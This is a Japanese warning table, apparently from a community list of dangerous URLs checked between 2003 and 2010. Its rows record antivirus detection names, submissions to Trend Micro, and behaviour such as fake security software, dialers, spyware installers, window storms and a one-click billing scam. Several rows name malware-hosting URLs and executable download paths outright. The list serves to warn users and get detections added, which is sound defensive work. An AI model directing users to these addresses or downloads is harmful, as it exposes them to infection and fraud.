| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2009/03/11] | ウィルス名:TSPY_ONLINEG.IJQ |
| [2009/03/11] | ウィルス名:TSPY_ONLINEG.IJY |
| [2009/03/11] | ウィルス名:POSSIBLE_OLGM-23 |
| [2009/01/27] | ウィルス名:PAK_GENERIC.001 |
| [2003/11/14] | system updateを装ったスパイウェア。 |
| [2005/01/17] | 外しにくいツールバーが降ってくる。 |
| [2007/05/03] | ウィルス名:EXPL_ANICMOO.GEN |
| [2007/05/03] | ウィルス名:TSPY_BZUB.A |
| [2008/11/07] | 以下の @ のURLに飛び、インチキセキュリティサイトを表示する。
また、以下の A のファイルをDLしろ、と催促してくる。 @、//antivir-scan-av-free.net/1/?id=21151 A、//fav-download-software-base.net/antivirus.v.1.0.21151.exe |
| [2004/09/26] | //314zdec.biz/sextracker.html を呼ぶ。 |
| [2008/03/22] | ウィルス名:TROJ_ALMANAHE.AC |
| [2007/05/03] | ウィルス名:TROJ_DLOADER.ALL |
| [2007/05/03] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
| [2006/01/25] | ウィルス名:ADW_EZULA.A |
| [2005/01/21] | 3つともウィルス名:VBS_REDLOF.A-11 |
| [2004/10/27] | mailtoストーム。 |
| [2004/08/14] | mailtoストーム。//www.raus.de/crashme/ に飛ぶ。 |
| [2005/12/08] | 再確認。ウィルス名:HTML_SUAR.A+mailtoストーム。環境により、FDDアタックも起きるらしい。 |
| [2004/09/27] | 「DARK LOLITAS」系というウィルス+スパイウェア満載のサイト。
詳細はKiken URL List各ページの以下のURL解説を参照。 //213.159.117.133/dl/ms.php //pizdato.biz/acc59/counter.htm //x.full-tgp.net/?ms.com |
| [2006/05/27] | 再確認。「ページを表示できません」となる。 |
| [2004/09/26] | 無限JavaScript。 |
| [2006/01/05] | 再確認。無限ウィンドウオープン。「about:blank」のウィンドウが開き続ける。親元のタスクを強制終了で脱出可。 |
| [2008/10/19] | ウィルス名:TROJ_NUWAR.AAU |
| [2006/10/21] | 以前はTELNETストームだったが、現在は404である。 |
| [2008/12/11] | ウィルス名:TROJ_AGENT.AHCI |
| [2005/02/02] | ウィルス名:JAVA_BYTEVER.A 。閉じると全画面表示が複数開き、それを閉じると別サイトの全画面表示など。 |
| [2005/04/20] | 改めて確認。ウィルス名:JAVA_BYTEVER.A 。サムネイル形式のアダルトサイトだが、リンク先でもウィルスを検出。 |
| [2006/09/10] | 再確認。ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
海外アダルトサイトで、これ を表示し、閉じるとIEがフリーズする。 また、これ も8枚表示したりする。その他にも様々な挙動がある。 |
| [2006/09/10] | 他の方の結果は以下。
「謎のアラートが表示される海外アダルトサイトに逝きました。 閉じると大窓が開かれ、IEがCPU使用率高のままフリーズ。 プロセスから脱出後もう一度踏んでみるとアラート後に開かれるページはJAVAを起動後にウイルス反応あり。 Trojan-Downloader.Win32.Agent.acd 、Constructor.Perl.Msdds.b 、Exploit.JS.CVE-2005-1790.f 、Trojan-Downloader.Win32.Ani.c を Kaspersky で検出。」 |
| [2004/09/26] | 無限JavaScript。 |
| [2006/09/17] | ウィルス名:DIAL_RAS.AM |
| [2008/10/19] | exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。 |
| [2008/10/19] | ウィルス名:DIAL_SAPIR.A |
| [2008/10/19] | exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。 |
| [2008/10/19] | ウィルス名:DIAL_SAPIR.A |
| [2008/10/19] | exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。 |
| [2008/10/19] | ウィルス名:DIAL_SAPIR.A |
| [2008/10/19] | exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。 |
| [2006/10/30] | 2006/10/16 にトレンドマイクロ社にファイルを提出。
2006/10/20 にその結果の連絡があり、ウィルス名:DIAL_AYKE.B として検出するよう対応、とのこと。 実際に 2006/10/16 にDLしたファイルからウィルス名:DIAL_AYKE.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_AYKE.B を検出することを確認。 |
| [2008/10/19] | exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。 |
| [2008/10/19] | こんな感じ のページ。少し経つと これ を表示する。
「OK」を選ぶと、再び これ を表示。「キャンセル」を選ぶとウィルス名:TROJ_GENERIC を検出して以下のURLに飛び、真っ白なページを表示する。 //acceso.masminutos.com/Showdoc.asp?IdFile= |
| [2006/07/08] | ウィルス名:TROJ_PERFILER.B |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/08] | ウィルス名:TROJ_PERFILER.B |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/10/22] | ウィルス名:DIAL_PORNDIAL.MG |
| [2007/03/21] | 2006/10/22 にトレンドマイクロ社にファイルを提出。
2006/10/31 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/22 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/22 から今日まではファイルの置き換えは行われていないと推測される。 |
| [2006/10/31] | 2006/10/22 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_SEXDIALER.A として検出するよう対応、とのこと。 実際に 2006/10/22 にDLしたファイルからウィルス名:DIAL_SEXDIALER.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_SEXDIALER.A を検出することを確認。 |
| [2006/09/01] | 2006/08/26 にトレンドマイクロ社にファイルを提出。
2006/08/31 にその結果の連絡があり、ウィルス名:DIAL_PORNDIAL.MD として検出するよう対応、とのこと。 2006/08/26 にDLしたファイルからウィルス名:DIAL_PORNDIAL.MD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.MD を検出することを確認。 |
| [2007/02/01] | ウィルス名:DIAL_EZDIAL.C |
| [2005/08/07] | スパイウェアサイトと思われるサイト。
直打ちで行くと飛んでまず この画面 を表示。 このウィンドウ画面を閉じて再びIEを開き、直打ちで行くと再び飛んで この画面 を表示。 ところが、このウィンドウ画面のアドレス欄に「 http://accessplugin.com/ 」と再び打ち込んでいくと今度は別のアドレスに飛び、 この画面 を表示。 そして、 これ を表示。拒否すると これ を表示。「OK」を押すともう1回 これ と これ を繰り返す。 そして、3回目の これ を表示。それを拒否すると今度は これ を表示。「OK」を押すと「Xfullgames.exe」なるアプリケーションをDLしろ、と催促してくる。DLしてみると、バスター無反応だが、以下のアンチウィルスソフトで反応。中身はダイヤラーである。 AntiVir → DIAL/Generic dialer Avast → Win32:Dialer-410 ClamAV → Dialer-300 Dr.Web → not a virus Dialer.Premium Kaspersky Anti-Virus → Trojan.Win32.Dialer.jr NOD32 → a variant of Win32/Dialer |
| [2007/05/03] | ウィルス名:TROJ_ZLOB.CHK |
| [2008/08/29] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FW |
| [2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
| [2008/12/20] | ウィルス名:TROJ_ZLOB.EXF |
| [2007/01/11] | 2006/12/30 にトレンドマイクロ社に中身の「cartao.scr」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_BANLOAD.CAX として検出するよう対応、とのこと。 実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.CAX を検出することを確認。 2006/12/30 から今日までのファイルの置き換えは無いと推測される。 |
| [2009/03/15] | ファイルサイズ:405 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。 |
| [2008/10/04] | ウィルス名:TROJ_FAKEAV.FP |
| [2005/11/03] | 踏むと最初は4〜5枚程度の海外アダルトサイトが開く。放っておくと次々と色々なアダルトサイトが開いていき、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A を検出するサイトもある。 |
| [2006/04/14] | 再確認。こんな感じ のサイト。怪しい挙動は確認出来なかった。 |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2005/03/31] | 踏むと上半分がロシア系アダルトサイト、下半分が中国系アダルトサイト、という妙なページ構成になっている。
このページ自体は無害。このページを閉じると以下の2つのどちらかが新窓で開く。 1、//www.maturesparadise.net/ ← ウィルス名:JS_MHTREDIR.F+JAVA_BYTEVER.A+JAVA_BYTEVER.C 2、//elite.super-puper.com/ajax/ajax.php ← 何もなし。 |
| [2006/07/09] | ウィルス名:TROJ_LADDER.B |
| [2006/07/09] | ウィルス名:TROJ_LADDER.D |
| [2005/09/19] | 踏むと真っ白なページ。SPYBOT反応:DoubleClick 。スパイウェア系のクッキーらしい。
htmlでは無く、実際は 43Bytes の縦1px、横1pxの image/gif である。 |
| [2008/07/10] | ウィルス名:PAK_Generic.006 |
| [2008/11/27] | ウィルス名:TROJ_DLOADE.CUA |
| [2008/10/19] | ウィルス名:BKDR_POPWIN.FV |
| [2006/06/12] | 踏むと「ErrorSafe」というインチキスパイウェア駆除ソフトをインストールしろ、と言ってくる。 |
| [2007/02/09] | このファイルは「 exe_ 」なので注意。2007/02/01 にトレンドマイクロ社にファイルを提出。
2007/02/06 にその結果の連絡があり、ウィルス名:TSPY_BANKER.GIE として検出するよう対応、とのこと。 実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANKER.GIE を検出することを確認。 2007/02/01 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/02/09] | このファイルは「 exe_ 」なので注意。2007/02/01 にトレンドマイクロ社にファイルを提出。
2007/02/06 にその結果の連絡があり、ウィルス名:TROJ_BANLOAD.BPK として検出するよう対応、とのこと。 実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.BPK を検出することを確認。 2007/02/01 から今日まではファイルは置き換えられていないと推測される。 |
| [2005/12/10] | ウィルス名:SPYW_ADBLOCK.A 。実行するとレジストリの変更を余儀なくされる。 |
| [2005/12/10] | 踏むと こんな感じ だが、いきなりバスターが反応。ウィルス名:SPYW_ADBLOCK.Aを検出する。
そして、その後すぐに //adblock.linkz.com/Error.htm に飛び、こんな感じ になる。 |
| [2005/12/10] | こんな感じ のスパイウェア配布サイト。このページ表示まで無害で、普通に閉じれる。
しかし、画面の上と中央にある「Install AdBlock Now For FREE」のどちらかをクリックすると、以下の 1. のURLに飛び、ウィルス名:SPYW_ADBLOCK.Aを検出。そして検出後、すぐに 2. に飛ぶ。 1. では、3. の/APHelper.dll#Version=1,0,0,6をいきなりDLしようとする。 |
| [2006/08/20] | ウィルス名:CHM_ADLOAD.HJ |
| [2006/09/07] | 2006/08/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DH として検出するよう対応、とのこと。 2006/08/20 にDLしたファイルからウィルス名:CHM_CODEBASE.DH を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DH を検出することを確認。 |
| [2006/08/20] | ウィルス名:CHM_SNIPLOAD.A |
| [2006/10/31] | 2006/10/23 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DI として検出するよう対応、とのこと。 実際に 2006/10/23 にDLしたファイルからウィルス名:CHM_CODEBASE.DI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DI を検出することを確認。 |
| [2006/08/20] | ウィルス名:CHM_SYSDOC.B |
| [2006/08/20] | ウィルス名:CHM_MEDTICKS.V |
| [2008/07/05] | ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.M |
| [2008/07/05] | 不明なファイルが落ちてくる。812バイト。バスターが拒否。
恐らく、以下のファイルに関係するものと思われる。 //ads.adslooks.info/ads/ads.exe |
| [2008/07/05] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AJHU |
| [2008/07/05] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AJHU |
| [2008/07/05] | ウィルス名:TSC_GENCLEAN+TROJ_ALMANAHE.AC |
| [2005/04/04] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
AntiVir → TR/Dldr.Agent.hw2.B ClamAV → Adware.Dealhelper |
| [2005/03/12] | ウィルス名:JS_NOCLOSE.RY |
| [2006/01/15] | このexeのアイコンは真っ白で、全く見えないので注意。
バスター無反応だが、以下のアンチウィルスソフトで反応。 Dr.Web → Trojan.DownLoader.4980 NOD32 → probably unknown NewHeur_PE Norman Virus Control → Sandbox: W32/Downloader |
| [2007/03/13] | ウィルス名:ADWARE_DROPSPAM |
| [2007/04/03] | 2007/03/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:Adware_DropSpam として検出するよう対応、とのこと。 実際に 2007/03/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:Adware_DropSpam を検出することを確認。 2007/03/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/03/13] | ウィルス名:ADWARE_DROPSPAM |
| [2007/04/03] | 2007/03/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:Adware_DropSpam として検出するよう対応、とのこと。 実際に 2007/03/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:Adware_DropSpam を検出することを確認。 2007/03/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/03/13] | ウィルス名:TROJ_HORST.HH |
| [2007/03/13] | ウィルス名:TROJ_HORST.HG |
| [2007/03/13] | ウィルス名:TROJ_HORST.HF |
| [2008/07/06] | ウィルス名:TSC_GENCLEAN+TROJ_SMALL.CZD |
| [2008/07/11] | 2008/07/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOAD.BA として検出するよう対応、とのこと。 実際に 2008/07/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOAD.BA を検出することを確認。 2008/07/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2008/07/06] | ウィルス名:ADW_ZQUEST.AH |
| [2008/07/06] | ウィルス名:ADW_ADSPY.CE |
| [2005/08/09] | 踏むと下のURLに飛ぶ。下のURLのキャプ画像は これ 。
//adv1.eblocs.com/spyblocs/adv/evenu_006.html スパイウェア駆除ソフト関連のページだが、このソフトは「スパイウェア駆除ソフトを装ったスパイウェア」である。 |
| [2004/12/28] | spybot反応:SexTracker 。ページ自体は表示されない。 |
| [2006/08/20] | ウィルス名:CHM_MEDMOTOR.B |
| [2006/09/07] | バスター無反応だが、他社製アンチウィルスソフトで反応する。
2006/08/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、このファイルは「破損ファイル」とのこと。 |
| [2006/08/20] | ウィルス名:CHM_SNIPLOAD.A |
| [2006/10/31] | 2006/10/23 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DI として検出するよう対応、とのこと。 実際に 2006/10/23 にDLしたファイルからウィルス名:CHM_CODEBASE.DI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DI を検出することを確認。 |
| [2006/10/24] | ウィルス名:CHM_SYSDOC.B |
| [2006/10/24] | ウィルス名:CHM_MEDTICKS.V |
| [2007/03/13] | ウィルス名:ADWARE_EZULA |
| [2005/12/09] | スパイウェアサイトと思われるサイト。こんな感じ のサイトだが、ダイアログを表示して、何かをインストールするよう催促される。拒否すると こんな感じ になる。
何かをインストール、の「何か」とは //www.adtraffic.net/pr/at_homepage.cab と思われる。 そのcabファイルをDL+解凍すると「EEStartup.exe」なるものが現れるが、Dr.Webで Trojan.DownLoader.5535, BACKDOOR.Trojan を検出。 詳細は こちら を参照。 |
| [2005/08/15] | 軽いブラクラの一種と思われる。このURLを踏むと真っ白なページなのだが、自動でリロードを延々と繰り返す。ウィンドウを閉じれば終了する。 |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2004/12/04] | ウィルス名:JAVA_BYTEVER.A。多くの別窓表示。全画面表示もあり。 |
| [2004/05/29] | 何かのソフトをDLさせてこようとするブラクラ。キャンセルを押すと一時アラートオープン。 |
| [2004/05/30] | スパイウェアの可能性。スタートページを書き換えられる。 |
| [2004/06/07] | ウィルス名:Trojan.ByteVerify
IEで踏むとウィルスセキュリティ警告が出てツールバーをインストールしようとする。 IEのスタートページをエロサイトにするかの選択画面が出てくる。しかも全画面表示になる。 |
| [2009/04/29] | アダルトサイトのようだが、ウィルス名:HTML_IFRAME.HT を検出。 |
| [2007/01/09] | 海外アダルトサイト。動画をDLしようとすると、exeファイルを落としてくる。
exeファイルのURLは以下である。このファイルはトレンドマイクロ社に調査依頼中である。 //movies-codecs.com/download/movies-codecs1005.exe |
| [2007/03/24] | 何かの動画が再生できるようであるが、その前に以下のファイルをDLしろ、と言ってくる。
//codecfeature.com/download/codecfeature1211.exe ← ウィルス名:TROJ_ZLOB.CVK |
| [2005/11/03] | 踏むと最初は4〜5枚程度の海外アダルトサイトが開く。放っておくと次々と色々なアダルトサイトが開いていき、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.Aを検出するサイトもある。 |
| [2006/08/01] | 2006/07/21 にDL+解凍して現れた「belgio.ocx」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AD として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AD を検出することを確認。 |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/08] | ウィルス名:TROJ_ADPOWER.C |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/20] | ウィルス名:DIAL_ADPOWER.T |
| [2006/08/01] | 2006/07/21 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。 |
| [2006/08/02] | 2006/07/22 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。 |
| [2006/07/20] | ウィルス名:DIAL_ADPOWER.T |
| [2006/07/08] | ウィルス名:DIAL_ADPOWER.B |
| [2006/07/08] | ウィルス名:DIAL_ADPOWER.A |
| [2006/07/08] | ウィルス名:DIAL_ADPOWER.I |
| [2006/07/08] | ウィルス名:TROJ_CLICKER.AF |
| [2006/07/08] | ウィルス名:TROJ_ADPOWER.D |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/08] | ウィルス名:TROJ_Generic |
| [2006/07/11] | ウィルス名:TROJ_ADPOWER.D |
| [2006/08/01] | 2006/07/21 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。 |
| [2005/08/16] | 踏むと こんな表示 をし、すぐに//afris.biz/sex.htmlに飛んで、ウィルス名:TROJ_ANICMOO.Fを検出。 |
| [2005/06/16] | ウィルス名:JAVA_BYTEVER.A
APPLETタグで /classload.jar を実行しようとし、実行後は /xpehbamnow.exe を落としてくる。 IE最新バッチなら未実行で終わる。 |
| [2005/08/16] | ウィルス名:HTML_REDIR.AI |
| [2005/08/16] | ウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A
//afris.biz/first/1/ass.htmlに飛ぶ。 |
| [2005/06/16] | ウィルス名:JAVA_BYTEVER.A |
| [2005/06/16] | ウィルス名:TROJ_SMALL.AGP |
| [2005/08/16] | ウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A+TROJ_ANICMOO.F
IFRAMEタグで以下の4つのURLを呼び出す。それぞれのURL解説を参照。 //afris.biz/e.html //afris.biz/first/a0/ //afris.biz/first/ //afris.biz/first/1/ass.html |
| [2005/12/29] | 踏むといきなりウィルス名:JS_IFRAMEBO.E+JS_WINDEXP.A+JS_ONLOADXPLT.A を検出。
こんな感じ のページだが、これ を4枚立て続けに表示する。 |
| [2005/08/16] | ウィルス名:TROJ_ANICMOO.F |
| [2005/07/02] | ウィルス名:JAVA_BYTEVER.A |
| [2005/07/02] | ウィルス名:JAVA_BYTEVER.A を検出し、//agostino.biz/index2.htmll に変わり、その後、アドレスは「res:///」に変わる。
//agostino.biz/index2.htmll ← 「 html 」では無く、「 htmll 」である。 セキュリティ環境により、//agostino.biz/server.exe を仕込まされる場合あり。 |
| [2005/07/02] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/HideWindows.A.1, TR/Inor.1, TR/Inor.5, BDS/Mox.16, BDS/Zcrew.13 ArcaVir → Trojan.Mirc-based Avast → Win32:Trojano-756 AVG → HideWindow, IRC/BackDoor.Flood BitDefender → Trojan.Flood.22016, Trojan.HideWindows.A, Exploit.IIS.WebDir, Backdoor.IRC.Mox, BehavesLike:Trojan.Downloader Dr.Web → Trojan.Flood.22016, BackDoor.IRC.based, IRC.Generic.69 F-Prot → W32/Hidewnd.component, IRC/AftpX.A, IRC/Flood.Y Kaspersky → not-a-virus:Tool.Win32.HideWindows, not-a-virus:Client-IRC.Win32.mIRC.82 NOD32 → IRC/Mox.A, probably a variant of IRC/Bnc.G , probably a variant of IRC/Bnc.L , probably a variant of IRC/Zcrew.O VBA32 → RiskWare.Tool.HideWindows, Trojan.Dropper.Small.12 |
| [2008/12/20] | ウィルス名:TROJ_EXCHANGE.EE |
| [2008/11/25] | こんな感じ のサイトだが、ウィルス名:MAL_HIFRM を検出。 |
| [2004/08/13] | 無限JavaScriptの可能性。 |
| [2005/10/13] | ウイルス名:W32.HLLW.Antinny [ ノートン ]
ウィルス名:WORM_ANTINNY.A [ ウィルスバスター ] そのzip内に入っているEXE(名前:紺野あさ美2nd写真集『なつふく』.exe)にワーム系ウィルスが仕込まれている。EXE を発動しない限り感染はしない。 その他に画像96枚あるが、すべて「オラヲタ写真集買え」と書かれた画像。 |
| [2008/10/19] | ウィルス名:TROJ_AGENT.AWRZ |
| [2006/06/17] | バスター無反応だが、以下のアンチウィルスソフトで反応。ワンクリサイト関連の exe と思われる。
AntiVir → Trojan/PSW.Kapod.P.49 ClamAV → Trojan.Kapod-25 Kaspersky → Trojan-PSW.Win32.Kapod.p NOD32 → a variant of Win32/Tsipe exeを実行すると「ご入会ありがとうございます。お客様の情報をIP=***.***.***.***で登録しました。只今から72時間以内にご入金くださいますようお願いいたします。」という小さなウィンドウを表示。 そのウィンドウの「OK」を押すと、「振込が確認できておりません。大至急お支払い下さい。」というウィンドウが出て以下の文を表示。 「サイト利用されたにも関わらず、支払期限を過ぎても入金が確認出来ない場合は「お客様情報」を元にプロバイダに対して 法的な手段を経て、情報開示を求めます。ログを元に自宅や勤務先へ直接請求させて頂く可能性がございます。その際に当番組管理部より延滞料金 \30,000、延滞1日に付き1,000円の損害金を加算して請求されることがありますので期日の方、お忘れないようにお願い致します。」 また、リモホ情報も別ウィンドウで表示して、カネを払え、と言ってくる。その内容は以下。 ご利用期間 「90日間」 ご利用料金 「\69,825」→「\44,000」(2日以内限定) |
| [2006/07/25] | 2006/07/14 にトレンドマイクロ社にファイルを提出。
2006/07/18 に返事があり、ウィルス名:TSPY_KAPOD.CF として対応」とのこと。 しかし、実際にDLしてみると、バスター無反応であったので、トレンドマイクロ社に再調査依頼。 今日、返事があり、ウイルスパターンファイル「3.587.00」よりウィルス名:TSPY_KAPOD.P」として検出するよう対応とのこと。 しかし、実際にDLしてもバスター無反応であった。恐らく、随時、新しいファイルに置き換えられるURLと推測される。 |
| [2006/08/03] | 今日、再度、トレンドマイクロ社から連絡があり、「ウイルスパターンファイル 3.607.00 にてウィルス名:TSPY_KAPOD.CH を検出することを確認」とのこと。
確認すると、2006/07/25 にDLしたファイルからウィルス名:TSPY_KAPOD.CH を検出。しかし、当該URLは現在、「403 Forbidden」になっている。 |
| [2005/04/15] | DLして解凍すると、2枚のtxtと「Blast.exe」なるものが入っている。
バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。 AntiVir → ウィルス名:PMS/Blast.Tool possible malicious software mks_vir → ウィルス名:Trojan.Exploit.Blast |
| [2005/04/15] | ウィルス名:HKTL_BRUTUS.A 。DOS攻撃ツールらしい。 |
| [2005/05/03] | ウィルス名:TROJ_FDOSFORT.A |
| [2009/08/14] | こんな感じ のサイトだが、ウィルス名:JS_DLOADER.BD を検出。 |
| [2009/11/04] | 再確認。こんな感じ のサイト。
ウィルス名:EXPL_ANICMOO.GEN+JS_AGENT.AKFL+TROJ_ANIFILE.F を検出。 このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。 |
| [2009/04/18] | こんな感じ のサイトだが、ウィルス名:JS_AGENT.AKFE+EXPL_EXECOD.A+JS_AGENT.AKFL+EXPL_ANICMOO.GEN+JS_DLOAD.MD を検出。 |
| [2009/05/06] | こんな感じ のサイトだが、ウィルス名:JS_AGENT.AKFE を検出。
リロードを繰り返すサイトで、その度にウィルスを検出する。 |
| [2009/11/04] | こんな感じ のサイト。
ウィルス名:EXPL_ANICMOO.GEN+JS_AGENT.AKFL+EXPL_EXECOD.A を検出。 このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。 |
| [2010/05/10] | こんな感じ のサイト。バスター無反応だったが、中国系URLを呼び出している形跡を確認。
その中国系URLが確認時にたまたま無害だったため、反応しなかったかもしれない。が、要注意。 |
| [2010/05/10] | 他の方の結果では、「 Trojan.JS.Agent.bhm (Kaspersky) を検知しました。」 |
| [2009/11/04] | こんな感じ のサイト。
ウィルス名:EXPL_ANICMOO.GEN+JS_DLOADER.BD+TROJ_ANIFILE.F を検出。 このサイトは FRAME タグを使って //www.4gameranking.com/xin/ を呼び出しているのが原因。 |
| [2009/01/14] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
何かを呼び出している。少し経って「about:blank」になる。 |
| [2009/01/14] | ウィルス名:EXPL_ANICMOO.GEN |
| [2009/01/14] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD+EXPL_ANICMOO.GEN+EXPL_EXECOD.A を検出。
何かを呼び出している。少し経って「about:blank」になる。 |
| [2009/01/14] | ウィルス名:PAK_GENERIC.001 |
| [2009/01/14] | 真っ白なページだが、ウィルス名:JS_DLOAD.MD を検出。 |
| [2009/01/14] | 真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。 |
| [2008/12/20] | ウィルス名:TROJ_DLOADER.LPQ |
| [2008/11/25] | ウィルス名:MAL_BANKER |
| [2007/05/20] | 2007/02/19 にトレンドマイクロ社にファイルを提出。
2007/02/21 にその結果の連絡があり、ウィルス名:ADW_MYWEBSEARC.O として検出するよう対応、とのこと。 しかし、今日改めて当該URLからDLしてみるとウィルス名:ADWARE_MYWEBSEARCH を検出する。 |
| [2008/10/14] | バスター無反応だが、Kaspersky で not-a-virus:AdTool.Win32.MyWebSearch.cw を検出するらしい。 |
| [2006/08/25] | 2006/08/19 にトレンドマイクロ社にDL+解凍して現れた「f3Setup1.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_FUNWEB.B として検出するよう対応した、とのこと。 2006/08/19 にDLしたファイルからウィルス名:ADW_FUNWEB.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FUNWEB.B を検出することを確認。 |
| [2006/08/25] | 2006/08/19 にトレンドマイクロ社にDL+解凍して現れた「f3Setup1.exe」ファイルを提出。
